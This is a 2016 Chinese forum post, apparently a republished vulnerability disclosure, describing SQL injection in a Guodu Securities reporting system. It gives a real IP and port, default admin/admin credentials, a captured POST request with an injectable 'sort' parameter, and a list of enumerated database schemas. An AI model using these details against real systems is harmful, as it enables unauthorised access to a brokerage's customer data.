HanDs
管理员

[7月漏洞公开] 国都证券某处SQL注入漏洞 



详细说明:

问题出在http://im.guodu.com:9090中,



首先是弱口令进入系统,http://111.205.160.129:9090/report

admin admin



发现注入点,发包如下:

code 区域
POST /report/Service/kpi/pageCustomerCount HTTP/1.1
Host: 111.205.160.129:9090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://111.205.160.129:9090/report/Service/kpi/count/customer
Content-Length: 143
Cookie: JSESSIONID=CA77F75B4233D0EF890FBD1C9E973215
Connection: keep-alive

startDate=2016%2F05%2F23+00%3A00%3A00&endDate=2016%2F06%2F7+23%3A59%3A59&companyId=1&showFooter=false&page=1&rows=20&sort=customerId&order=asc





sort参数存在注入,

14659554910914.jpg





看到GUODURA数据库中两个表数据量非常大:

1.jpg



2.jpg



所有数据库列表如下:

code 区域
[*] APEX
[*] CENTER_ADMIN
[*] CENTER_ETL
[*] CENTER_ETL2
[*] CENTER_PUB
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDCMS
[*] GDZQ
[*] GUODU
[*] GUODURA
[*] JRTZ
[*] MDSYS
[*] MONI
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] RATEST
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] UCSTAR
[*] WEIXIN
[*] WMSYS
[*] WSYYT
[*] WSYYT_TEST
[*] XDB



漏洞证明:

同上

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
国都 贾と
#1楼
发帖时间:2016-7-6   |   查看数:0   |   回复数:0
游客组
快速回复